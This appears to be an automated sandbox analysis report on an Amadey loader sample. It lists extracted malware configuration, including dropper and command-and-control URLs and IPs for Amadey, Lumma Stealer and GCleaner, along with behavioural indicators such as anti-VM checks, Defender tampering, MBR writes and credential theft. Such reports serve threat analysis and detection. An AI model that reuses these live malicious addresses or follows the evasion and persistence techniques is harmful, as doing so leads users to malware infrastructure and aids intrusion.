amadey | 61640ecc146e8a94f78921ed912709004e4d736f3b43c96281079a66dc84d4cf

Analysis

max time kernel
141s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
03/04/2025, 14:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

db91f36bd4f08a8f50250c161c883972
SHA1

67d683869aae0a35bf288fe15567e18b65de240b
SHA256

61640ecc146e8a94f78921ed912709004e4d736f3b43c96281079a66dc84d4cf
SHA512

21345be206d5919f26b0afef06a9f372cc706a361696ad72ec67435f13dd780740d1419af6d6364251425cce406c7dd9a543ba91b29e75a15c9e4e138b954f2a
SSDEEP

24576:UqDEvCTbMWu7rQYlBQcBiT6rprG8a4ju:UTvC/MTQYxsWR7a4j

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://tacticaltalks.live/glKShay

https://metalsyo.digital/opsa

https://iironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://6grxeasyw.digital/xxepw

https://ywmedici.top/noagis

https://ironloxp.live/aksdd

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000024361-266.dat	family_stormkitty
behavioral1/memory/5956-279-0x0000000000570000-0x00000000005AC000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e6d163131d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3c788c05e7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8ce048e8db.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6526e72213.exe

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/4064-219-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-218-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-223-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-225-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-224-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-222-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4064-221-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	1988	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1988	powershell.exe
1836	powershell.exe
4680	powershell.exe
6064	powershell.exe
5020	powershell.exe
5632	powershell.exe
6664	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 14 IoCs

flow	pid	Process
48	2896	rapes.exe
48	2896	rapes.exe
78	1640	futors.exe
111	2896	rapes.exe
111	2896	rapes.exe
122	3252	svchost015.exe
151	4020	svchost015.exe
6	1988	powershell.exe
64	2896	rapes.exe
127	2896	rapes.exe
69	2896	rapes.exe
90	2896	rapes.exe
90	2896	rapes.exe
112	2116	svchost.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	P3Ow4LV.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	P3Ow4LV.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2276	icacls.exe
5192	takeown.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6526e72213.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e6d163131d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8ce048e8db.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6526e72213.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e6d163131d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3c788c05e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3c788c05e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8ce048e8db.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	amnew.exe

Executes dropped EXE 34 IoCs

pid	Process
2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
2896	rapes.exe
4344	apple.exe
5056	261.exe
1472	261.exe
4460	P3Ow4LV.exe
4520	rapes.exe
5340	9sWdA2p.exe
5956	amnew.exe
1640	futors.exe
4640	updater.exe
2892	i4cwegu.exe
2824	e6d163131d.exe
5956	Yhihb8G.exe
3140	Yhihb8G.exe
2304	3c788c05e7.exe
3252	svchost015.exe
3052	9sWdA2p.exe
3164	P3Ow4LV.exe
4020	svchost015.exe
3256	TbV75ZR.exe
1180	dojG16n.exe
4536	7IIl2eE.exe
1348	UZPt0hR.exe
2588	rapes.exe
1600	futors.exe
3008	8ce048e8db.exe
2796	6526e72213.exe
5844	updater.exe
5744	tzutil.exe
6784	UZSECGPC.exe
6920	UZSECGPC.exe
3596	ISBEW64.exe
3892	ISBEW64.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	e6d163131d.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	3c788c05e7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	8ce048e8db.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	6526e72213.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe

Loads dropped DLL 6 IoCs

pid	Process
6920	UZSECGPC.exe
6920	UZSECGPC.exe
6920	UZSECGPC.exe
6920	UZSECGPC.exe
6920	UZSECGPC.exe
6920	UZSECGPC.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5192	takeown.exe
2276	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3c788c05e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10049930101\\3c788c05e7.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
80	ipinfo.io
81	ipinfo.io
83	ipinfo.io

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4996	powercfg.exe
5384	powercfg.exe
3748	powercfg.exe
3036	powercfg.exe
2576	powercfg.exe
5876	powercfg.exe
2152	powercfg.exe
5528	powercfg.exe
4012	powercfg.exe
4736	powercfg.exe
4636	powercfg.exe
6016	powercfg.exe
5060	powercfg.exe
3824	powercfg.exe
2736	powercfg.exe
5616	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	8ce048e8db.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	P3Ow4LV.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File opened for modification	C:\Windows\system32\MRT.exe	P3Ow4LV.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
2896	rapes.exe
4520	rapes.exe
2824	e6d163131d.exe
2304	3c788c05e7.exe
2588	rapes.exe
3008	8ce048e8db.exe
2796	6526e72213.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4640 set thread context of 5636	4640	updater.exe	240
PID 4640 set thread context of 4064	4640	updater.exe	243
PID 2824 set thread context of 3252	2824	e6d163131d.exe	257
PID 2304 set thread context of 4020	2304	3c788c05e7.exe	268
PID 3256 set thread context of 2796	3256	TbV75ZR.exe	270
PID 1180 set thread context of 2564	1180	dojG16n.exe	272

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4064-213-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-214-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-219-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-217-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-215-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-218-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-216-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-223-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-225-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-224-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-222-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4064-221-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4708	sc.exe
2284	sc.exe
6056	sc.exe
3284	sc.exe
3656	sc.exe
324	sc.exe
3980	sc.exe
5272	sc.exe
2704	sc.exe
1832	sc.exe
2228	sc.exe
5656	sc.exe
1316	sc.exe
5932	sc.exe
4892	sc.exe
5040	sc.exe
5920	sc.exe
2356	sc.exe
4340	sc.exe
5892	sc.exe
5652	sc.exe
1876	sc.exe
1000	sc.exe
3428	sc.exe
4300	sc.exe
5632	sc.exe
5240	sc.exe
1240	sc.exe
2692	sc.exe
5640	sc.exe
6028	sc.exe
2564	sc.exe
5236	sc.exe
5572	sc.exe
5876	sc.exe
1696	sc.exe
1660	sc.exe
3248	sc.exe
232	sc.exe
5560	sc.exe
4304	sc.exe
1260	sc.exe
4008	sc.exe
2368	sc.exe
836	sc.exe
2488	sc.exe
6012	sc.exe
1528	sc.exe
4836	sc.exe
2252	sc.exe
4184	sc.exe
4644	sc.exe
4508	sc.exe
6136	sc.exe
4456	sc.exe
4732	sc.exe
3852	sc.exe
4120	sc.exe
4820	sc.exe
5880	sc.exe
4616	sc.exe
2840	sc.exe
2264	sc.exe
5812	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5632	5956	WerFault.exe	246
5020	3140	WerFault.exe	253

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3c788c05e7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
